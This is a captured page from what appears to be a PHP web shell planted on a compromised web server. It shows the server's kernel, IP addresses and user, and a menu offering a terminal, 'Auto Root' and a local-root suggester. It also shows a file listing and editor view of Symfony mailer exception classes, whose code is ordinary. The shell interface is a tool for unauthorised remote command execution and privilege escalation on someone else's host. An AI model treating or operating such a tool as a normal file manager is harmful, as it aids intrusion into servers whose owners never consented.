Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.133.149.244
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
vendor /
symfony /
mailer /
Exception /
Delete
Unzip
Name
Size
Permission
Date
Action
ExceptionInterface.php
464
B
-rw-rw-r--
2022-08-03 05:17
HttpTransportException.php
1.01
KB
-rw-rw-r--
2022-08-03 05:17
IncompleteDsnException.php
413
B
-rw-rw-r--
2022-08-03 05:17
InvalidArgumentException.php
441
B
-rw-rw-r--
2022-08-03 05:17
LogicException.php
421
B
-rw-rw-r--
2022-08-03 05:17
RuntimeException.php
425
B
-rw-rw-r--
2022-08-03 05:17
TransportException.php
639
B
-rw-rw-r--
2022-08-03 05:17
TransportExceptionInterface.php
506
B
-rw-rw-r--
2022-08-03 05:17
UnsupportedSchemeException.php
2.85
KB
-rw-rw-r--
2022-08-03 05:17
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Mailer\Exception; use Symfony\Contracts\HttpClient\ResponseInterface; /** * @author Fabien Potencier <fabien@symfony.com> */ class HttpTransportException extends TransportException { private $response; public function __construct(?string $message, ResponseInterface $response, int $code = 0, \Throwable $previous = null) { if (null === $message) { trigger_deprecation('symfony/mailer', '5.3', 'Passing null as $message to "%s()" is deprecated, pass an empty string instead.', __METHOD__); $message = ''; } parent::__construct($message, $code, $previous); $this->response = $response; } public function getResponse(): ResponseInterface { return $this->response; } }